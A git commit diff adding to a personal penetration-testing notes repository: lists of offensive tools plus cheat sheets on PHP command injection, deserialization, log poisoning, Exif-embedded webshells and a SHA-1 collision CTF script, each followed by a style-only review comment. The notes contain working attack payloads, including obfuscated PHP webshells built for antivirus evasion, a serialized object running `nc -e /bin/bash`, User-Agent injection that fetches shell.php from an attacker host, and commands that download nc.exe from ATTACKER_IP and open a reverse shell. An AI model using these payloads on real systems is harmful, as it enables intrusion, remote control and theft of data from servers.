cleanup done

This commit is contained in:
Stefan Etringer 2022-11-13 22:52:30 +01:00
parent b75bcb944f
commit 0c98cfe60f
13 changed files with 218 additions and 8 deletions


@ -7,6 +7,29 @@
[netbiosX' Checklists](https://github.com/netbiosX/Checklists.git)
## Web
* [JSONBee - Bypass Content Security Policy](https://github.com/zigoo0/JSONBee.git)
* [Beef Framework](https://github.com/beefproject/beef.git)
### JWT
* [jwt Generator](https://jwt.io/)
* [jwt-cracker](https://github.com/lmammino/jwt-cracker.git)
* [jwt_tool](https://github.com/ticarpi/jwt_tool.git)
### SSTI
[tplmap](https://github.com/epinna/tplmap.git)
### XXE
* [xxeserv](https://github.com/staaldraad/xxeserv.git)
### CMS
[Typo3Scan](https://github.com/whoot/Typo3Scan.git)
## Domain Enumeration
[Subrake](https://github.com/hash3liZer/Subrake.git)
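Review bot: list style is inconsistent within the new Web section: the JWT and XXE entries are `* ` bullets while `tplmap` under `### SSTI` and `Typo3Scan` under `### CMS` are bare links; bullet those two as well. Typo3Scan also still appears under the top-level `## CMS` heading later in the same file, so one of the two copies should be dropped.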
@ -14,13 +37,15 @@
[gobuster](https://github.com/OJ/gobuster.git)
[RustScan](https://github.com/RustScan/RustScan.git)
## SMB Enumeration
[ShawnDEvans' smbmap](https://github.com/ShawnDEvans/smbmap.git)
## Container Enumeration
[kubeletctl](https://github.com/cyberark/kubeletctl.git)
[deepce](https://github.com/stealthcopter/deepce.git)
## CMS
[Typo3Scan](https://github.com/whoot/Typo3Scan.git)
[dive](https://github.com/wagoodman/dive.git)
## Telecommunications
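Review bot: `dive` is an image-layer explorer and belongs under `## Container Enumeration` next to `kubeletctl` and `deepce`, not under `## CMS` beside Typo3Scan. With Typo3Scan now duplicated under `### CMS` in the Web section, the standalone `## CMS` heading here becomes redundant and could be removed once `dive` is moved.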

12
Enumeration/SMBmap.md Normal file

@ -0,0 +1,12 @@
# smbmap
* [Repo](https://github.com/ShawnDEvans/smbmap.git)
* `python3 -m pip install -r requirements.txt`
# Usage
* `-x` execute command on server
* `-s` enumerate share
```sh
smbmap -u "admin" -p "password" -H "10.10.10.10" -x 'ipconfig'
```
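Review bot: `# Usage` is a second H1; make it `## Usage` so the page has a single title. The install line `python3 -m pip install -r requirements.txt` assumes the repo has already been cloned and entered, so add that step before it. The `-s` description should name the argument it takes (a share name), and the example passes the password in clear on the command line with `-p`, which lands in shell history; a short remark that this is a lab-only form would be appropriate.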


@ -9,6 +9,25 @@
[Padbuster - padding Oracle Attacks](https://github.com/AonCyberLabs/PadBuster.git)
### PHP
* [Chankro](https://github.com/TarlogicSecurity/Chankro.git)
* [phpgcc](https://github.com/ambionics/phpggc.git)
## Binaries
* [ropstar](https://github.com/xct/ropstar.git)
## Windows
* [crackmapexec](https://github.com/Porchetta-Industries/CrackMapExec.git)
* [Impacket](https://github.com/SecureAuthCorp/impacket.git)
* [windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits.git)
* [PrintNightmare](https://github.com/ly4k/PrintNightmare.git)
* [printspoofer](https://github.com/dievus/printspoofer.git)
* [CVE-2021-1675](https://github.com/corelight/CVE-2021-1675.git)
## Printer Exploitation
[RUB-NDS Printer Exploitation Framework](https://github.com/RUB-NDS/PRET.git)
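Review bot: the link text `phpgcc` does not match the repository in its own URL (`ambionics/phpggc`); rename it to `phpggc`. The Printer Exploitation entry is a bare link while every other item in this hunk is a `* ` bullet; bullet it for consistency.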


@ -1,4 +1,8 @@
# Command Injection
# PHP Command Injection
Injecting commands to execute code on the server side via php.
* [Hacktricks](https://book.hackstricks.xyz/pentesting-web/file-upload)
* Blind injection
* Verbose injection
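Review bot: the Hacktricks URL uses the host `book.hackstricks.xyz`, which looks like a typo (`hacktricks`), and its path points at the file-upload page rather than a command-injection page; verify and fix the link. `# Command Injection` followed by `# PHP Command Injection` gives the file two H1 headings; the second should be `##`. In the description, `php` should be written `PHP`.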
@ -8,12 +12,12 @@
* Redirect to logfile and read
* Use `sleep` or `timeout` to check if ci is possible in general
### Detect Blind Command Injection
Try to save output to URI resource like `output.php`
## Functions
* Watch out for
* `eval()`
* `exec()`
* `passthru()`
* `system()`
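Review bot: `ci` in "check if ci is possible in general" is ambiguous (command injection or CI); spell it out. The `Watch out for` bullet and the four function bullets sit at the same indentation, so the functions no longer read as its sub-items; indent them one level. `shell_exec()` belongs in the same list as `exec()`/`passthru()`/`system()`, especially since the Exif payload file added in this same commit uses it.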


@ -0,0 +1,6 @@
# PHP Filter
* Include into GET query, and get index page, for example
```sh
<URL>/?view=php://filter/read=convert.base64-encode/resource=./dog/../index
```
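Review bot: the fence is tagged `sh` but contains a URL with a `php://filter` wrapper, not a shell command; use an untagged fence. The bullet should also say what the request returns (the base64-encoded source of `index.php` instead of its rendered output) and why the `./dog/../` prefix is present (presumably to satisfy a prefix check on the `view` parameter), otherwise the single line is opaque to a reader of the notes.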


@ -0,0 +1,29 @@
# Unserialize
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize)
* Serialize via
```php
<?php
class FormSubmit {
public $form_file = 'messages.php';
public $message = '<?php
if(isset($_GET[\'cmd\']))
{
system($_GET[\'cmd\']);
}
?>';
}
print urlencode(serialize(new FormSubmit));
?>
```
```php
<?php class file
{
public $file = 'rev.php'; public $data = '<?php shell_exec("nc -e /bin/bash $TARGET_IP 4455"); ?>';
}
echo (serialize(new file));
?>
```
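Review bot: both snippets only make sense against an application that itself defines a class named `FormSubmit` (with `form_file`/`message` properties) or `file` (with `file`/`data`), because `unserialize()` instantiates whatever class the serialized string names; the bullet should state that these names come from the linked writeup's target and must be replaced by the classes the vulnerable application actually loads. Style-wise, `<?php class file` with `{` on the next line and the two `public` declarations on one line should be split to one statement per line, matching the first snippet.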


@ -0,0 +1,35 @@
# PHP Payload in Image ExifData
* Test
```sh
exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" test-USERNAME.jpeg.php
```
* Build Payload with AV evasion
```sh
<?php
$cmd = $_GET["wreath"];
if (isset($cmd)){
echo "<pre>" . shell_exec($cmd) . "</pre>";
}
die();
?>
```
* [php obfuscater](https://www.gaijin.at/en/tools/php-obfuscator)
* Obfuscated code with escaped `$`
```sh
<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>
```
* Upload and execute commands with get parameter `?wreath=systeminfo`
## Uploading Reverse through Webshell
* Parameter for Webshell
```sh
curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe
```
* Trigger uploaded netcat
```sh
powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe
```
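Review bot: the second and third fences contain PHP, not shell, yet are tagged `sh`; tag them `php` (the obfuscated one keeps its `\$` escapes as the bullet says, so note that it is meant to be pasted into a shell string). `obfuscater` is misspelt (`obfuscator`, as in the URL). In the `curl` line the doubled backslashes in `c:\\windows\\temp\\nc-USERNAME.exe` are shell-escaping artefacts; say which shell or parameter context the command is typed into so the reader knows whether to keep them. The heading `## Uploading Reverse through Webshell` is missing a word (reverse shell).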


@ -0,0 +1,20 @@
# RCE inside HTTP Request Header
* a.k.a. Log Poisoning
* User Agent can be filled with php code
```sh
GET /?view=./dog/../../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1
Host: 10.10.59.238
User-Agent: <?php file_put_contents('monkey.php',file_get_contents('http://<attacker-IP>:<attacker-Port>/shell.php')); ?>
[...]
```
* copied from browser as curl command:
```
curl 'http://10.10.211.157/?ext=%20HTTP/1.1&view=./dog/../../../../var/log/apache/access.log' -H "User-Agent: <?php file_put_contents('monkey.php', file_get_contents('http://10.9.7.193:8000/shell.php'));?>"
```
* go to the access log
```sh
10.10.211.157/?ext=.log&view=./dog/../../../../var/log/apache2/access
```
* Afterwards visit `10.10.211.157/monkey.php`
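Review bot: the log path is inconsistent across the three blocks: the raw request and the final URL use `/var/log/apache2/access.log`, while the curl command uses `/var/log/apache/access.log`; keep the one that actually matched. The host changes between `10.10.59.238` and `10.10.211.157` (different lab instances), and the attacker address is `<attacker-IP>:<attacker-Port>` in one block but a literal `10.9.7.193:8000` in the next; use one set of placeholders throughout. The curl fence has no language tag while the other fences use `sh`.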


@ -0,0 +1,4 @@
# Password Reset
* Using a password reset while inserting an email address via GET and POST method.
* `$_REQUEST` as an array favors POST over GET. So, sending the attacker email address via POST with the GET query parameter.
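Review bot: the second bullet ends in a fragment ("So, sending the attacker email address via POST with the GET query parameter.") and presents the `$_REQUEST` precedence as fixed. In PHP the merge order is governed by the `request_order` ini directive (the shipped php.ini uses `"GP"`, so POST entries overwrite GET entries), so the note should say the behaviour is configuration-dependent and finish the sentence with what the application does with each copy of the address.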


@ -0,0 +1,15 @@
# Preload Library
* [Bug report](https://bugs.php.net/bug.php?id=46741)
* [Chankro repo](https://github.com/TarlogicSecurity/Chankro.git)
## Usage
* Create lib, find path via `<URL>/phpinfo.php`
```sh
echo "#!/usr/bin/env bash" > rev.sh
echo "cat /etc/passwd > <basepath>/output.txt" >> rev.sh
python2 ./chankro.py --arch 64 --input rev.sh --output chan.php --path <basepath>
```
* Put into image file via exiftool or write magic header
* Upload
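Review bot: the title `# Preload Library` and the three bullets never say what is preloaded or at which step `rev.sh` actually runs; one sentence explaining that Chankro packages `rev.sh` into the generated `chan.php` (presumably via a preloaded shared library, given the `--arch` flag) and that `<basepath>` (the `--path` value) must be the server-side directory found through `phpinfo.php` would make the page self-contained. `python2` in the command is an end-of-life dependency and is worth flagging. The `cat /etc/passwd > <basepath>/output.txt` line reads as the only test; say it is a placeholder command.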

4
Hashes/CeWL.md Normal file

@ -0,0 +1,4 @@
# Cewl
* Wordlist generator from website
* [CeWl repo](https://github.com/digininja/CeWL.git)
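Review bot: the tool's name is spelt three ways (`Cewl` in the heading, `CeWl` in the link text, `CeWL` in the URL and file name); use `CeWL` throughout. "Wordlist generator from website" would read better as "Generates a wordlist by crawling a website".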

33
Hashes/Hash Collisions.md Normal file

@ -0,0 +1,33 @@
# Hash Collisions
# SHA-1
* http://shattered.io
* The following code is taken from a writeup from [bl4ade's repo](https://github.com/bl4de/ctf/blob/master/2017/BostonKeyParty_2017/Prudentialv2/Prudentialv2_Cloud_50.md)
```python
#!/usr/bin/env python
import requests
# this is copy/paste from Hex editor - two different files with the same SHA1 checksum
name = '255044462D312E33 0A25E2E3 CFD30A0A 0A312030 206F626A 0A3C3C2F 57696474 68203220 3020522F 48656967 68742033 20302052 2F547970 65203420 3020522F 53756274 79706520 35203020 522F4669 6C746572 20362030 20522F43 6F6C6F72 53706163 65203720 3020522F 4C656E67 74682038 20302052 2F426974 73506572 436F6D70 6F6E656E 7420383E 3E0A7374 7265616D 0AFFD8FF FE002453 48412D31 20697320 64656164 21212121 21852FEC 09233975 9C39B1A1 C63C4C97 E1FFFE01 7F46DC93 A6B67E01 3B029AAA 1DB2560B 45CA67D6 88C7F84B 8C4C791F E02B3DF6 14F86DB1 690901C5 6B45C153 0AFEDFB7 6038E972 722FE7AD 728F0E49 04E046C2 30570FE9 D41398AB E12EF5BC 942BE335 42A4802D 98B5D70F 2A332EC3 7FAC3514 E74DDC0F 2CC1A874 CD0C7830 5A215664 61309789 606BD0BF 3F98CDA8 044629A1 3C68746D 6C3E0A3C 73637269 7074206C 616E6775 6167653D 6A617661 73637269 70742074 7970653D 22746578 742F6A61 76617363 72697074 223E0A3C 212D2D20 40617277 202D2D3E 0A0A7661 72206820 3D20646F 63756D65 6E742E67 6574456C 656D656E 74734279 5461674E 616D6528 2248544D 4C22295B 305D2E69 6E6E6572 48544D4C 2E636861 72436F64 65417428 31303229 2E746F53 7472696E 67283136 293B0A69 66202868 203D3D20 27373327 29207B0A 20202020 646F6375 6D656E74 2E626F64 792E696E 6E657248 544D4C20 3D20223C 5354594C 453E626F 64797B62 61636B67 726F756E 642D636F 6C6F723A 5245443B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 383B3C2F 48313E22 3B0A7D20 656C7365 207B0A20 20202064 6F63756D 656E742E 626F6479 2E696E6E 65724854 4D4C203D 20223C53 54594C45 3E626F64 797B6261 636B6772 6F756E64 2D636F6C 6F723A42 4C55453B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 393B3C2F 48313E22 3B0A7D0A 0A3C2F73 63726970 743E0A0A'
password = '25504446 2D312E33 0A25E2E3 CFD30A0A 0A312030 206F626A 0A3C3C2F 57696474 68203220 3020522F 48656967 68742033 20302052 2F547970 65203420 3020522F 53756274 79706520 35203020 522F4669 6C746572 20362030 20522F43 6F6C6F72 53706163 65203720 3020522F 4C656E67 74682038 20302052 2F426974 73506572 436F6D70 6F6E656E 7420383E 3E0A7374 7265616D 0AFFD8FF FE002453 48412D31 20697320 64656164 21212121 21852FEC 09233975 9C39B1A1 C63C4C97 E1FFFE01 7346DC91 66B67E11 8F029AB6 21B2560F F9CA67CC A8C7F85B A84C7903 0C2B3DE2 18F86DB3 A90901D5 DF45C14F 26FEDFB3 DC38E96A C22FE7BD 728F0E45 BCE046D2 3C570FEB 141398BB 552EF5A0 A82BE331 FEA48037 B8B5D71F 0E332EDF 93AC3500 EB4DDC0D ECC1A864 790C782C 76215660 DD309791 D06BD0AF 3F98CDA4 BC4629B1 3C68746D 6C3E0A3C 73637269 7074206C 616E6775 6167653D 6A617661 73637269 70742074 7970653D 22746578 742F6A61 76617363 72697074 223E0A3C 212D2D20 40617277 202D2D3E 0A0A7661 72206820 3D20646F 63756D65 6E742E67 6574456C 656D656E 74734279 5461674E 616D6528 2248544D 4C22295B 305D2E69 6E6E6572 48544D4C 2E636861 72436F64 65417428 31303229 2E746F53 7472696E 67283136 293B0A69 66202868 203D3D20 27373327 29207B0A 20202020 646F6375 6D656E74 2E626F64 792E696E 6E657248 544D4C20 3D20223C 5354594C 453E626F 64797B62 61636B67 726F756E 642D636F 6C6F723A 5245443B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 383B3C2F 48313E22 3B0A7D20 656C7365 207B0A20 20202064 6F63756D 656E742E 626F6479 2E696E6E 65724854 4D4C203D 20223C53 54594C45 3E626F64 797B6261 636B6772 6F756E64 2D636F6C 6F723A42 4C55453B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 393B3C2F 48313E22 3B0A7D0A 0A3C2F73 63726970 743E0A0A'
print '[+] create URL decoded strings to send as GET parameters [name] and [password]...'
name = ''.join(name.split(' '))
password = ''.join(password.split(' '))
namestr = ''.join(['%' + name[i] + name[i + 1]
for i in range(0, len(name)) if i % 2 == 0])
passwordstr = ''.join(['%' + password[j] + password[j + 1]
for j in range(0, len(password)) if j % 2 == 0])
print '[+] sending request to http://54.202.82.13/?name=[name]&password=[password]'
u = 'http://54.202.82.13/?name={}&password={}'.format(namestr, passwordstr)
resp = requests.get(u, headers={
'Host': '54.202.82.13'
})
```
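Review bot: the script is Python 2 (`print` statements without parentheses) and will not run on a current interpreter; convert the two prints. The target `http://54.202.82.13/` was the 2017 CTF instance and is hard-coded three times; hoist it into one variable and label it as the challenge host, which is long gone. The `name` string begins with `255044462D312E33` where `password` begins with `25504446 2D312E33`; harmless after the `split(' ')` join, but worth normalising. The two-line comprehensions that build `%XX` sequences can be written as `''.join('%' + name[i:i + 2] for i in range(0, len(name), 2))`, which is shorter and clearer, and `resp` is assigned but never used, so the script gives no indication of whether the collision was accepted. Finally, `# SHA-1` should be `## SHA-1` under the `# Hash Collisions` title.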


@ -1,5 +1,9 @@
# Hashes References
## Hash Collisions
[corkami's collisions collection](https://github.com/corkami/collisions.git)
## Password and Username Generation
[exrex](https://github.com/asciimoo/exrex.git)